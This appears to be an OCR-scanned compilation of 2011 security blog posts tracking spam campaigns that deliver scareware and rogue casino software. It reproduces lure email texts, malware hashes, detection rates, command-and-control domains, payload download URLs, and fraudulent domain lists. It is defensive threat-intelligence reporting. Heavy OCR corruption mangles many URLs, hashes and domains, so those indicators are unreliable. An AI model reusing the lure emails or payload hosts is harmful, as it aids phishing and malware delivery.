id=cd902b92042435c2d70d4bf59acc2de8229bfc367626961 

f76c03f 

75dcd7e95c-l 301586582 

6. http.V/ddanchev.blo as pot.com/2007707/sal-iniection- 
throuah-search-enaines.html 

7. http.V/ddanchev.blo as pot.com/2009/04/massive-sq l- 
in iections-throuah-search.html 
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8. http.V/ddanchev. blo as pot. com/2008/1O/massive-sq l- 
in iection-attacks-chinese.html 

9. http.V/ddanchev.blo as pot.com/2010/07/cvbercriminals-sa l- 
in iect-cvbercrime.html 

10. http.V/ddanchev.blo as pot. com/2010/04/aodaddvs-mass- 
wordoress-bloas.html 

11. http.V/ddanchev.blo as pot.com/2010/04/dissectin a- 
wordpress-bloas-comoromise.html 

12. http.V/ddanchev.blo as oot.com/2008/05/vet-another- 
massive-sal-iniection.html 

13. http.V/ddanchev.blo as oot.com/2008/07/smells-like- 
cop vcat-sql-iniection-in.html 

14. http.V/ddanchev.blo as pot.com/2008/05/fast-fluxina-sq l- 
in iection-attacks. html 





















































15. htto.V/ddanchev.blo as pot.com/2008/07/obfuscating-!ast- 
fluxed-sal-iniected.html 

16. htto://ddanchev.bio as oot. com/ 
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Spamvertised DHL Notifications Scareware Campaign 
(2011-04-04 16:44) 

Yet another currently spamvertised campaign is 
impersonating DHL for scareware serving purposes. 

Sample subjects: DHL notification #random number 

Sample message: Dear customer! The parcel was send 
your home address. And it will arrice within 7 bussness day. 

More information and the tracking number are attached in 
document below. Thank you. 2011 DHL International 

GmbH. All rights reserverd. 

Sample filenames: DHL_tracking.zip; doc.zip; dhi.zip 
Detection rates: 

dhl.exe - [l]Backdoor:Win32/Hostil.gen!A - Result: 22/40 
(55.0 %) 


MD5 : 87d778169ael4d934b92ce628b5cfde4 









SHA1 : 20787fde3b7fde64cc3892c4df9a4eb2a2515830 


5HA256: 

6b54ff520fa6ff504f5f2f0c33af8b92424f0b538a 760f4eb983d 
76007d3fe54 

Downloads 

additional 

binary 

from 

puskovayaustanovka.ru/pusk2. exe 


46.161.20.66 


Email: 

ad- 

min@puskovayaustanovka. ru 

pusk2.exe - [2]Trojan.Fakeaiert.20509 - Result: 11/41 (26.8 
%) 

MD5 : a9be091 eedea94 7f8626dl 1042e0d9be 

SHA1 : 9c 1 d399d4 7a 6ef6081553a 101 ab48fca61859db4 


5HA256: 

d4f5802a392c0851 d5el 9118d56cc8b578fl a07085aa5772cb 
dcf484608ed094 
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Upon execution phones back to the following domains: 
kynugypenihyf.com - Email: v8@ca4.ru 
cylakydugudi.com - Email: acts@free-id.ru 
fevahanybyvu.com - Email: fs@free-id.ru 
gicyxepomer.com - Email: tabs@yourisp.ru 
bemojewedowigo.com - Email: fs@free-id.ru 
sakafiduzipame.com - Email: build@ca4.ru 
wetotyger.com - Email: acts@free-id.ru 
kytevaviqopoci.com - Email: fs@free-id.ru 
wamojafadezy.com - Email: kilt@bz3.ru 
tetagyjaj.com - Email: kilt@bz3.ru 
jerakidukojoz.com - Email: wrap@cheapbox.ru 
cixovatywo.com - Email: frenzy@ca4.ru 
jafybobik.com - Email: force@ca4.ru 
nizokatahinery.com - Email: foxy@cheapbox.ru 
cujicaraso.com - Email: beret@ca4.ru 
zuzosahule.com - Email: only@free-id.ru 
gokuzajylot.com - Email: silks@ca4.ru 


jumonevetode.com - Email: silks@ca4.ru 
dafatesomyz.com - Email: zq@bz3.ru 
lukofymela.com - Email: silks@ca4.ru 
jebuponip.com - Email: iost@free-id.ru 
quxovasuced.com - Email: hp@ppmaii.ru 
laqoduhisegu.com - Email: shot@bz3.ru 
xyseditacif.com - Email: hart@free-id.ru 
wylyxaqunowy.com - Email: mows@bz3.ru 
qepovexidysopy.com - Email: byob@yourisp.ru 
bebecebyt.com - Email: mows@bz3.ru 
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dihemehypuq.com - Email: shot@bz3.ru 

rumesexyzobuz.com - Email: dawn@bz3.ru 

gopilezavyxiro.com - Email: hush@bz3.ru 

hyvijinymut.com/1017000312 - 99.198.114.189 - returns 
OK 

Domains are respoding to the following ASs: AS18866; 

AS32097: 

quxovasuced.com - 69.50.209.139 
laqoduhisegu.com - 69.50.209.140 


wylyxaqunowy.com - 69 . 50 . 209.148 
qepovexidysopy.com - 69 . 50 . 209.149 
fevahanybyvu.com - 69 . 50 . 209.182 
bemojewedowigo.com - 69 . 50 . 209.183 
gicyxepomer.com - 69 . 50 . 209.184 
sakafiduzipame.com - 69 . 50 . 209.185 
wamojafadezy.com - 69 . 50 . 209.186 
kytevaviqopoci.com - 69 . 50 . 209.188 
jebuponip.com - 69 . 50 . 209.223 
cylakydugudi.com - 69 . 50 . 209.224 
wetotyger.com - 69 . 50 . 209.225 
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nizokatahinery.com - 69 . 197 . 161.202 
cujicaraso.com - 69 . 197 . 161.203 
kynugypenihyf.com - 69 . 197 . 161.204 
jafybobik.com - 69 . 197 . 161.205 
tetagyjaj.com - 99 . 198 . 114.98 
jerakidukojoz.com - 99 . 198 . 114.99 
gopilezavyxiro.com - 99 . 198 . 114.100 
cixovatywo.com - 99 . 198 . 114.101 



hyvijinymut.com - 99 . 198 . 114.189 
zuzosahuie.com - 204 . 12 . 223.170 
jumonevetode.com - 204 . 12 . 223.171 
dafatesomyz.com - 204 . 12 . 223.172 
gokuzajylot. com - 204 . 12 . 223.173 
lukofymela.com - 204 . 12 . 223.174 
rumesexyzobuz.com - 204 . 12 . 223.186 
xyseditacif. com - 204 . 12 . 223.187 
dihemehypuq.com - 204 . 12 . 223.188 
bebecebyt.com - 204 . 12 . 223.189 
Monitoring of the campaign is ongoing. 

Related posts: 

[3] Spamvertised Post Office Express Mail (USPS) 
Emails Serving Malware 

[4] Spamvertised United Parcel Service notifications 
serve malware 

[SjSpamvertised FedEx Notifications Spread Malware 

[6] Spamvertised DHL Notification Malware Campaign 

[7] More Spamvertised DHL Notifications Spread 
Malware 


1 . 



htto: //www. virustotal. com/file-scan/report.html? 
id=6b54ff520fa6ff504f5f2f0c33af8b92424f0b538a 760f4eb98 

3d 7 


6007d3fe54-1301924841 

2 . 

http: 7/www. virustotal. com/file-scan/report.html? 
id=d4f5802a392c0851 d5el 9118d56cc8b5 78fla07085aa577 

2cbdcf4 

84608ed094-1301925356 

3. http.V/ddanchev.blo as pot.com/2011/03/spamvertised-eost- 
office-express-maii.html 

4. http.V/ddanchev.blo as pot.com/2011/03/spamvertised- 
united-parcel-service. html 

5. http.V/ddanchev.blo as pot.com/2011/03/spamvertised- 
fedex-no tide a tions-sprea d.html 

6. http.V/ddanchev.blo as pot.com/2011/03/spamvertised-dhl- 
notifidcation-malware.html 

7. http.V/ddanchev.blo as pot.com/2011/03/more- 
s pam vertised-dhl-notifications. html 
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Summarizing Zero Day's Posts for March (2011-04-04 
18:56) 



































The following is a brief summary of all of my posts at 
ZDNet's Zero Day for March. You can subscribe to my 

[ljpersonal RSS feed, [2]Zero Day's main feed , or 

follow me on Twitter: 

Recommended reading: 

• [3] Dear ISP, it's time to quarantine your malware-infected 
customers 

• [4] Zombie PC Prevention Bill to make security software 
mandatory 
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01. [5]Spamvertised 'You have received a gift from one of 
our members!' malware campaign 

02. [6]Report: malicious PDF files becoming the attack 
vector of choice 

03. [7]Ashton Kutcher's Twitter account hacked 

04. [8]Googie tops comparative review of malicious search 
results - again 

05. [9]Report: 3 million malvertising impressions served per 
day 

06. [lOJDear ISP, it's time to quarantine your malware- 
infected customers 

07. [ll]SpyEye gets new DDoS functionality 

08. [12]Spamvertised DHL notifications lead to malware 

09. [13]Spamvertised FedEx notifications lead to malware 



10. [14]Rustock botnet's operations disrupted 

11. [15]Malicious Japan quake spam leads to sea re ware 

12. [16]5pamvertised United Parcel Service notifications 
lead to malware 

13. [17]Researchers release details on 34 SC ADA 
vulnerabilities 

14. [18]Zombie PC Prevention Bill to make security software 
mandatory 

15. [19]Spamvertised Post Office Express Mail (USPS) emails 
lead to malware 

16. [20]New GpCode ransomware encrypts files, demands 
$125 for decryption 

17. [21 JMass SQL injection attack leads to sea reware 

This post has been reproduced from [22]Dancho 
Danchev's blog. Follow him [23Jon Twitter. 

1. htto://www.zdnet.com/tooics/dancho+danchev? 
Q=l&mode=rss&ta a =mantle skin;content 

2. htto://feeds. feed burner, com/zdnet/securit v 

3. httD://www.zdnet.com/bloa/securitv/dear-isD-its-time-to- 
auarantine-vour-malware-infected-customers/6712 

4. httD://www.zdnet.com/bloa/securitv/zombie-DC-Drevention~ 
bill-to-make-securitv-software-mandatorv/8487 

5. htto://www.zdnet.com/bioa/securit y/s oamvertised-vou- 
have-received-a-aift-from-one-of-our-members-malware- 



























camoaian/8250 


6. http://www.zdnet.com/bioa/securitv/reoort-maiicious-pdf- 
files-becomina-the-attack-vector-of-choice/8255 

7. http://www.zdnet.com/bloa/securitv/ashton-kutchers- 
twitter-a cco un t-hacked/8280 

8. http://www.zdnet.com/bloa/securit v/aoo ale-tops- 
comparative-review-of-malicious-search-results-aaa in/8306 

9. http://www.zdnet.com/bloa/securitv/report-3-million- 
malvertisina-impressions-served-Der-da v/8319 

10. htto://www. zdnet. com/bloa/securitv/dear-iso-its-time-to- 
auarantine-vour-malwa re-infected-customers/6712 

11. htto://www.zdnet.com/bloa/securit v/soveve- aets-new- 
ddos-functionalitv/8381 

12. http.V/www.zdnet.com/bloa/securit v/s pamvertised-dhi- 
notifications-lead-to-mal ware/8415 

13. http.V/www.zdnet.com/bioa/securit v/s pamvertised-fedex- 
notifications-lead-to-mal ware/8452 

14. http://www.zdnet. com/bloa/securitv/rustock-botnets- 
o pera tions-disrupted/8456 

15. http://www.zdnet. com/bloa/securitv/malicious- ia pan- 
quake-spam-leads-to-scareware/8463 

16. http://www. zdnet. com/bloa/securit v/s pam vertised-united- 
parcel-service-notifications-lead-to-malware/8478 

17. htto://www.zdnet. com/bloa/securitv/researchers-release- 
details-on-34-scada-vulnerabilities/8483 

































































18. htto://w\N\N. zdnet. com/bloa/securitv/zombie-oc- 

ore ven tion -bill- to-make-securitv-softwa re-manda torv/8487 


19. htto.V/www.zdnet.com/bioa/securit v/s oamvertised-oost- 
office-express-mail-usps-emails-lead-to-mal ware/8502 

20. http://www.zdnet.com/bloa/securitv/new- a pcode- 
ransomware-encr v pts-files-demands-125-for-decr v ption/8505 

21. http://www. zdnet. com/bloa/securitv/mass-sql-iniection- 
attack-leads-to-scareware/8510 

22. http://ddanchev.blo as eot.com/ 

23. http://twitter.com/danchodanchev 
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Don't Play Poker on an Infected Table - Part Four 
(2011-04-11 18:10) 

A currently spamvertised campaign is enticing users into 
downloading and executing a fraudulent online gambling 

application known as VegasVIP _setup.exe. 

Detection rate: 

VegasVIP_setup.exe - [ l]Win32/CazinoSilver - 
Result:16/42 (38.1 %) 

MD5 : 8680fa2868dd068f3cl d3995dfl 05243 

SHA1 : 4f3ecd72c223cf6el 30377a3ecd9149232dc848b 

5HA256: 

68ded50bf7c9b 7 f6961 e6334b25fdad5d2369e461051 d5a9fa 






























lflebaadebldOe 


Upon execution, the sample phones back to: 

www. online vegas. com/do wnload/upda te.php ? 
dl=0af374526b7b6eb6c54bf92cbld la236 &status=10 

The spammers are earning revenue by participating in the 
BestCasinoPartner.com Affiliate Program. More de¬ 
tails: 

" Turn Your Traffic Into BIG Monthly Cash! Join the 
BestCasinoPartner.com Affiliate Program and from the very 
start 731 
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you will earn a HUGE 30 % of ALL player GROSS losses 
EVERY month, no matter what your volume is! That's ALL 

player GROSS losses for the life of your referred players, with 
No Loss Carry-Forward! 

Refer an Affiliate: Get Even More. Earn 7 % override on the 
Casino Gross Revenue payment made to the re¬ 
ferred Affiliate for all players referred by your directly 
referred Affiliates - for the life of the player! Earn 5 % 
override on the Casino Gross Revenue payment made from 
your Web masters' referrals! AND... we even go One Step 
Further 

— a THIRD tier! 

Here are the THREE levels that will earn you profits for the 
life EACH player: 


• Tier 1: 7 % override on the Casino Gross Revenue 

• Tier 2: 5 % override on the Casino Gross Revenue 

• Tier 3: 3 % override on the Casino Gross Revenue" 

Participating affiliate domains are: OnlineVegas.com; 
GoCasino.com; CrazySiots.com and GrandVegas.com 

Related fraudulent online gambling domains part of the 
campaign: 

777fashionplays. ru 
777playsfashion.ru 
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bankpremiumplays. ru 
bank-premium-plays, ru 
bestfortuneplays. ru 
best-fortune-plays, ru 
bestplaysfortune. ru 
best-plays-fortune. ru 
bingobonusplays.ru 
bonus-bingo-plays, ru 
bon usplaysbingo. ru 
bonus-plays-bingo. ru 
class-plays- world, ru 



class- world-plays, ru 
crazyplaysroulette. ru 
crazy-plays-roulette. ru 
crazyrouletteplays. ru 
crazy-roulette-plays, ru 
elit-grand-games. ru 
elit-plays-king. ru 
fashion-plays- vegas. ru 
fashion-vegas-plays. ru 
fiveplaysstar. ru 
fortunebestplays. ru 
fortune-best-plays, ru 
fortuneplaysbest. ru 
fortune-plays-best. ru 
fortune-plays-land. ru 
fortunep laysparty, ru 
fortune-plays-party. ru 
games-elit-king. ru 
games-king-elit. ru 
gamespremiumbank. ru 



joker plays vegas. ru 
online-games-luxory. ru 
palaceplayscrystal. ru 
playsbankpremium. ru 
plays-bank-premium.ru 
playsbestfortune. ru 
plays-best-fortune. ru 
plays-bingo-bon us. ru 
pi ays bon usbingo. ru 
plays-bonus-bingo. ru 
pi ay sc I ass world, ru 
pi ayscrazyroulette, ru 
plays-crazy-roulette. ru 
play scrystalpalace. ru 
plays-crystal-palace. ru 
playsfashion777. ru 
playsfi vesta r. ru 
playsfortunebest. ru 
plays-fortune-party. ru 
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playsonlineextra. ru 
plays-plaza- west, ru 
playspremiumbank. ru 
playsroulettecrazy. ru 
plays-roulette-crazy. ru 
plays-royal-classic. ru 
plays-star-fi ve. ru 
plays vegasjoker. ru 
plays westplaza. ru 
plays- world- win.ru 
plaza -plays- west, ru 
plaza westplays. ru 
plaza - west-plays, ru 
premium-bank-plays, ru 
premiumplaysbank. ru 
roulette-crazy-plays, ru 
starfiveplays. ru 
star-five-plays, ru 
starplaysfive. ru 
vegas-fashion-plays. ru 



vegasjokergames. ru 
vegasjokerplays. ru 
vegas-joker-plays. ru 
vegas-plays-joker. ru 
westplaysplaza.ru 
west-plays-plaza.ru 
westplazaplays. ru 
west-plaza-plays, ru 
win-plays- world, ru 
win worldplays. ru 
win-world-plays, ru 
world-class-plays, ru 
world-plays-dass. ru 
Related posts: 

[2] Don't Play Poker on an Infected Table - Part Three 

[3] Don't Play Poker on an Infected Table - Part Two 

[4] Don't Play Poker on an Infected Table 

This post has been reproduced from [5]Dancho Danchev's 
blog. Follow him [6Jon Twitter. 


1 . 



htto: //www. virustotal. com/file-scan/reoort.html? 
id=68ded50bf7c9b 7 f6961 e6334b25fdad5d2369e461051 d5a 

9falfle 

baadebldOe-1302535749 

2. http://ddanchev. blo as oot. com/2010/03/dont-pla v- ooker- 
on-infected-table-part. html 

3. http://ddanchev.blo as pot.com/2010/02/dont-pla v- poker- 
on-infected-table-part. html 

4. htto.V/ddanchev.blo as oot.com/2007/09/dont-pla v- ooker- 
on-infected-table.html 

5. http://ddanchev.blo as oot.com/ 

6. htto://twitter.com/danchodanchev 
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Spamvertised "Reqest Rejected" Campaign Serving 
Scareware (2011-04-12 20:22) 

A currently spamvertised scareware-serving campaign is 
enticing end users into downloading and executing a 

malicious binary, which drops a scareware variant. 

Sample subject: Reqest rejected 

Sample message: " Dear Sirs, Thank you for your letter! 
Unfortunately we can not confirm your request! More 
information attached in document below. Thank you Best 
regards. " 

Sample attachments: EX-38463.pdf.zip; EX-38463.pdf.exe 
























Detection rate: 


EX-38463.pdf.exe - [l]TrojanDownloader:Win32/Chepvil.J 

- Result: 11/41 (26.8 %) 

MD5 : 5085 794e6c283ebcfa3878805b9e7be7 

SHA1 : Ifbd8d3b0a3479274d8f09543452bf724bcb245c 

5HA256: 

C03711dbafae9b296daed8720f997d84caa5e5a5407a689926 
050a061d67b932 

Upon execution downloads hdjfskh.net/pusk.exe - 
208.43.90.48 - Email: admin@firtryt.biz 

Detection rate: 

pusk.exe - [2]FakeAlert-CN.gen.aa - Result: 13/42 (31.0 %) 

MD5 : a50a91176b5aeb96b8b77b99d587c485 

SHA1 : C56b7ab2123dbd49902446ffcc0cf59d6a865857 

5HA256: 

C912a975e3c2fc911d6550d86e8fd89dbd30e3dle07d788b45 

aac0d6cf61e83c 
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Upon execution phones back to the following domains and 
ASs: 

Phones back to : AS19875; AS8001; AS24940; AS32475; 
AS32097; AS19875 


2bemojewedowigo.com - 78.46.105.205 


bemolaqijicy.com - 99.198.114.206 - Email: vista@free¬ 
l'd, ru 

ceiisesuho.com - 99.198.114.202 - Email: hush@bz3.ru 

cixovatywo.com - 78.46.105.205 - Email: frenzy@ca4.ru 

fytypoqywu.com - 64.46.38.94 - Email: 
fy4371215910301 @domainidshield. com 

gicyxepomer.com - 78.46.105.205 - Email: tabs@yourisp.ru 

gopilezavyxiro.com - 78.46.105.205 - Email: hush@bz3.ru 

hivanedak.com -188.95.54.242 - Email: steps@ppmail.ru 

hotilosire.com - 208.110.67.122 - Email: lathe@maillife.ru 

jerakidukojoz.com - 78.46.105.205 - Email: 
wrap@cheapbox. ru 

kupeqobujohaq.com - 64.46.38.145 - Email: 
soup@fastermail. ru 

kytevaviqopoci.com - 78.46.105.205 - Email: fs@free-id.ru 

pikilokykizanu.com - 65.254.54.77 - Email: dawn@free- 
id.ru 
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punajytapaci.com - 209.97.213.105 - Email: 
mire@maillife. ru 

qisacugugu.com - 64.46.38.129 - Email: as@free-id.ru 
qupajubica.com - 78.46.105.205 - Email: heard@bz3.ru 



reruravobosila.com - 67.196.13.96 - Email: 
mon@ppmail.ru 

rorodarof.com - 99.198.114.204 - Email: hush@bz3.ru 

ruqydahec.com - 67.196.13.97 - Email: mon@ppmail.ru 

sakafiduzipame.com - 78.46.105.205 - Email: 
buiid@ca4.ru 

sykobodyducib.com - 208.110.67.102 - Email: 
iathe@mai\iife. ru 

tetagyjaj.com - 78.46.105.205 - Email: kilt@bz3.ru 

tibehewuk.com - 209.97.213.102 - Email: mon@ppmail.ru 

tisatosyhimidy.com -188.95.54.243 - Email: jan@free-id.ru 

tyhiqymiwufuj.com - 208.110.67.121 - Email: dawn@free- 
id.ru 

vakyditefo.com - 99.198.114.203 - Email: vista@free-id.ru 

wamojafadezy.com - 78.46.105.205 - Email: acts@free- 
id.ru 

wetotyger.com - 78.46.105.205 - Email: acts@free-id.ru 

wixecyhobovy.com - 64.46.38.130 - Email: 
soup@fastermail. ru 

wolycunanoqe.com - 72.9.233.98 - Email: lathe@maillife.ru 

zajatimibuj.com - 208.110.67.119 - Email: 
bark@cheapbox. ru 



zequcitamado.com - 99.198.114.205 - Email: vista@free¬ 
l'd, ru 

punajytapaci.com/1017000412 - 209.97.213.105 - Email: 
mire@maillife. ru 

tibehewuk.com/1017000412 - 209.97.213.102 - Email: 
mon@ppmaii.ru 

Monitoring of the campaign is ongoing. 

This post has been reproduced from [3]Dancho Danchev's 
blog. Follow him [4]on Twitter. 

1. 

htto: 7/www. virustotal. com/fiie-scan/reoort.html? 
id=c03711dbafae9b296daed8720f997d84caa5e5a5407a689 

926050a 

061 d6 7b932-130262 7694 

2 . 

htto:7/www. virustotal. com/file-scan/report.html? 

id=c912 a9 75e3c2fc91 Id6550d8 6e8fd89dbd30e3dl e07d788 

b45aac0 

d6cf61 e83c~l 30262 7443 

3. htto://ddanchev.blo as pot.com/ 

4. htto://twitter.com/danchodanchev 
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Spamvertised ",SuccessfulI Order 977132" Leads to 
Scareware (2011-04-28 14:50) 

A currently ongoing malware campaign is impersonating 
Bobijou Inc for malware-serving purposes. 

Sample subject: " Successful/ Order 977132" 

Sample message: " Thank you for ordering from Bobijou 
Inc. This message is to inform you that your order has been 
received and is currently being processed. 

Your order reference is 901802. You will need this in all 
correspondence. This receipt is NOT proof of purchase. 

We will send a printed invoice by mail to your billing address. 

You have chosen to pay by credit card. Your card will be 
charged for the amount of 262.00 USD and "Bobijou 

Inc." will appear next to the charge on your statement. You 
will receive a separate email confirming your order has been 
despatched. Your purchase and delivery information appears 
below in attached file. 

Thanks again for shopping at Bobijou Inc. " 

Sample attachments: Order_detai\s.zip 

Detection rates: 

Order details.exe - [IjTrojan.FakeAV - Result: 24/40 (60.0 
%) 

MD5 : 7c810cbb4 7c9f93 7b5f663b51 ab 7ee50 

SHA1 : b4faf8c724727381 abbl 1 c44b71605ff6e65cbbf 



SHA256: 

0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faal9 

Cd43e02b904 

Upon execution phones back to : 

kkojjors.net/f/g.php - 95.64.9.15 - Email: admin@firtryt.biz 

variantov.com/pusk.exe - 94.63.149.26 - Email: 
admin@ varianto v. com 

Detection rate for the sea reware variant pusk.exe 
pusk.exe - [2]Suspicious.doud.5 - Result: 4/41 (9.8 %) 

MD5 : bbd466a67586003776e295eaf3d2976c 

SHA1 : 6a8eld84157c76b4c9238fc23d28686244f6650f 

SHA256: 

ee008f9039534f062bd2 77860060461064e760bdaa90a3659 
5b9780be54a5a05 
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Upon execution phones back to: 

jyluzovunevu.com - 209.160.45.33 - Email: 
gray@fxmail.net 

sesokiqufikeg.com - 209.160.45.34 - Email: 
gray@fxmail. net 

qyqinisope.com - 64.46.38.207 - Email: gray@fxmail.net 
hijocyragap.com - 64.46.38.81 - Email: robin@cutemail.org 


puhigygapyhi.com - 64.46.38.81 - Email: gray@fxmail.net 

zavewuzykubo.com - 64.46.38.80 - Email: 
robin@cutemail. org 

fepigixypo.com - 64.46.38.29 - Email: pyre@cutemaii.org 

tozibapah.com - 76.73.16.182 - Email: lays@fxmail.net 

qebinehuh.com - 76.73.14.182 - Email: lays@fxmail.net 

gygipikalyn.com - 76.73.17.242 - Email: ss@cutemail.org 

xygorinazecit.com - 76.73.17.70 - Email: ss@cutemail.org 

walireqoxyxyt.com - 64.46.39.185 - Email: 
orbit@fxmail. net 

moririnejuf.com - 64.46.39.184 - Email: purse@maill3.com 

jydosucin.com - 64.46.39.200 - Email: arm@fxmail.net 

libynozegokido.com - 64.46.39.186 - Email: 
orbit@fxmail. net 

zidacofodafur.com - 64.46.39.212 - Email: 
go wn@cutemail. org 

fequxukovo.com - 67.196.15.136 - Email: arm@fxmail.net 

gyxyqimacik.com - 67.196.15.138 - Email: 
purse@maill 3. com 

wizyvopyla.com - 67.196.15.137 - Email: arm@fxmail.net 

gyricehagupy.com - 67.196.15.139 - Email: 
purse@maill 3. com 
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punemipaqatyc.com - 67.196.15.141 - Email: 
ulcer@mailae. com 

gehotigyry.com - 67.196.15.140 - Email: hp@maiil3.com 

vufekihoto.com - 67.196.15.105 - Email: arm@fxmail.net 

huzomohidid.com - 67.196.15.104 - Email: arm@fxmaii.net 

posufejez.com - 67.196.15.107 - Email: purse@maiil3.com 

gewexyvunokyk.com - 67.196.15.106 - Email: 
purse@maill 3. com 

fowyqypacytucy.com - 209.160.45.32 - Email: 
soup@fastermail. ru 

koduzuwobow.com - 209.160.45.130 - Email: 
pyre@cutemail. org 

ciluvekypomow.com - 78.46.105.205 - Email: 
hips@cutemail. org 

7hitaxodupi.com - 64.46.38.30 

Monitoring of the campaign is ongoing. 

Related posts: 

[3] 5pamvertised "Reqest Rejected" Campaign Serving 
Sea re ware 

[4] Spamvertised DHL Notifications Scareware Campaign 

[5] Spamvertised Post Office Express Mail (USPS) Emails 
Serving Malware 



[6] Spamvertised United Parcel Service notifications serve 
malware 

[7] Spamvertised FedEx Notifications Spread Malware 

[8] Spamvertised DHL Notification Malware Campaign 

[9] More Spamvertised DHL Notifications Spread Malware 

This post has been reproduced from [lOJDancho 
Danchev's blog. Follow him [ll]on Twitter. 

1 . 

http://www. virustotal. com/file-scan/reDort.html? 
id=0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632fa 

a!9c 

d43e02b904-1303915483 

2 . 

http: //www. virustotal. com/file-scan/report, html? 

id=ee008f9039534f062bd2 77860060461064e760bdaa90a3 

6595b978 

0be54a5a05-1303916125 

3. htto://ddanchev.blo as oot.com/2011/04/soamvertised- 
reaest-reiected-camDaian.html 

4. htto://ddanchev.blo as oot.com/2011/04/soamvertised-dhl- 
notifications.html 

5. htto://ddanchev.blo as oot.com/2011/03/soamvertised-oost- 
office-express-maii.html 




























6. htto.Y/ddanchev.blo as oot.com/2011/03/soamvertised- 
united-oarcel-service.html 


7. htto://ddanchev.blo as oot.com/2011/03/soamvertised- 
fedex-notifications-soread.html 

8. htto.Y/ddanchev.blo as oot.com/2011/03/soamvertised-dhl- 
notificication-malware. html 

9. http://ddanchev.blo as pot.com/2011/03/more- 
s oam vertised-dhl-notifications. html 

10. htto://ddanchev.blo as oot.com/ 

11. htto://twitter.com/danchodanchev 
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Summarizing ZD Net's Zero Day Posts for April (2011- 
05-09 12:50) 

The following is a brief summary of all of my posts at 
ZD Net's Zero Day for April. You can subscribe to my 

[ljpersonal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 


Recommended reading: 






















• [3] Netcraft survey indicates slow adoption of Extended 
Validation SSL certificates 

01. [4]Spamvertised "Reqest Rejected" campaign leads to 
sea re ware 

02. [5]Spamvertised 'Facebook. Your password has been 
changed!' emails lead to malware 
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03. [6]Maiware Watch: 'Spam is sent from your Face Book 
account'; Spamvertised malicious photos 04. 
[7]Spamvertised Easter Greetings lead to malware 

05. [8]Netcraft survey indicates slow adoption of Extended 
Validation SSL certificates 

06. [9]'You've got a postcard' emails lead to exploits and 
sea re ware 

07. [lOJFake antivirus for mobile platform spotted 

This post has been reproduced from [HJDancho 
Danchev's blog. Follow him [12]on Twitter. 

1. htto://www.zdnet.com/tooics/dancho+danchev? 
o=l&mode=rss&ta a =mantle skin:content 

2. htto://feeds. feed burner, com/zdnet/securit v 

3. httD://www.zdnet.com/bloa/securitv/netcraft-surve v- 
indicates-slow-adoption-of-extended-validation-ssl-cer 

tificates/8576 

4. http.V/www.zdnet.com/bioa/securit v/s pamvertised-reqest- 
re iected-campaian-ieads-to-scareware/8529 




















5. htto://www.zdnet. com/bloa/securit v/s pam vertised- 

facebook-vour-Dassword-has-been-chanaed-emails-lead-to- 

ma 


lware/8545 

6. http://www.zdnet.com/bloa/securitv/malware-watch-spam- 
is-sent-from-vour-facebook-account-spamvertised-mal 

icious-photos/8565 

7. http://www.zdnet. com/bloa/securit v/s pamvertised-easter- 
areetinas-lead-to-malware/8571 

8. httoj//www.zdnet. com/bloa/securitv/netcraft-surve v- 
in dica tes-slo w-a doo tion-of-exten ded- 1 /a I Ida lion - ssl- cer 

tificates/8576 

9. htto://www.zdnet. com/bloa/securit v/ vouve-aot-a-Dostcard- 
emaiis-lead-to-exDloits-and-scareware/8590 

10. htto://www.zdnet. com/bloa/securitv/fake-antivirus-for- 
mobile-Dlatform-spotted/8594 

11. http.V/ddanchev.bio as oot. com/ 

12. htto://twitter.com/danchodanchev 
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Don't Play Poker on an Infected Table - Part Five 
( 2011 - 05-09 15 : 52 ) 

A currently spamvertised campaign is enticing end users into 
downloading a fraudulent online gambling application 















































KingSpinEN.exe. The campaign is part of last month's 
[lfDon't Play Poker on an Infected Table - Part Four series. 

Detection rate: 

KingSpinEN.exe - [2]W32/Casino.F.gen!Eldorado - 

Result:!6/43 (37.2 %) 

MD5 : ead8156a838842bc8463995a91eee08b 

SHA1 : 239594a514c461c63dc8da69b08b9b63baaf2579 

5HA256: 

491 c291 eaed67268dl 4a364 70e5d6f6d4ed829055fe4a2897 
ac5f050b50a2e36 

Upon execution phones back to: 

- download.thepalacegroupgaming.com /tracking.aspx? 
ul=en &casino=spinpalace &banner_tag=a20337 &uuid= 

%7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F %7d 
&state=100 

- spinpalace.mgsmup.com /mupp/spinpalace/spinpalace 
jn stall, cab 

- spinpalace.mgsmup.com 

/mupp/spinpalace/spinpalace. cab 

- download.thepalacegroupgaming.com /tracking.aspx? 
ul=en &casino=spinpalace &banner_tag=a20337 &uuid= 

%7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F %7d 
&state=422 

- marketing, valueactive.eu /VIP/animations/en/movies 
en.htm 



Portfolio of fraudulent online gambling domains part of the 
campaign. The majority are hosted within AS49130, 

ARNET-AS SC ArNet Connection SRL: 

casino-elit-super.ru - 89.45.14.12 
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casinogoidsuper.ru - 89.45.14.12 
casinokingsuper.ru - 89.45.14.12 
casino-king-super.ru - 89.45.14.12 
casinoiabsuper.ru - 89.45.14.12 
casino-iux-super.ru - 89.45.14.12 
casinomuitisuper.ru - 89.45.14.12 
casinonetsuper.ru - 89.45.14.12 
casino-net-super, ru - 89.45.14.12 
casinonextvip.ru -89.45.14.12 
casino-online-super.ru - 90.182.175.234 
casinopartysuper.ru - 90.182.175.234 
casino-party-super.ru - 90.182.175.234 
casinopiazasuper.ru - 90.182.175.234 
lcasinostarsuper.ru - 90.182.175.234 
casinosuperelit.ru -89.45.14.12 



casino-super-elit.ru - 89.45.14.12 
casinosuperking.ru - 89.45.14.12 
casino-super-king.ru -89.45.14.12 
casinosupermulti.ru - 89.45.14.12 
casinosupernet.ru - 89.45.14.12 
casino-super-net.ru - 89.45.14.12 
casino-super-online.ru - 90.182.175.234 
casinosupervip.ru - 89.45.14.12 
casino-super-vip.ru - 89.45.14.12 
casinosuperweb.ru - 89.45.14.12 
casino-super- web. ru -89.45.14.12 
casinosuperwin.ru - 89.45.14.12 
casino-super-win.ru - 89.45.14.12 
casinovipsuper.ru - 89.45.14.12 
casino-vip-super.ru - 89.45.14.12 
casino-win-super.ru - 89.45.14.12 
cazino-cash-multi.ru - 89.45.14.12 
3cazino-party-royai.ru - 89.45.14.12 
cazinopartyweb.ru - 89.45.14.12 
cazino-party-web.ru - 89.45.14.12 



cazinopartywin.ru -89.45.14.12 
cazino-party- win.ru -89.45.14.12 
cazinopiaza win.ru -89.45.14.12 
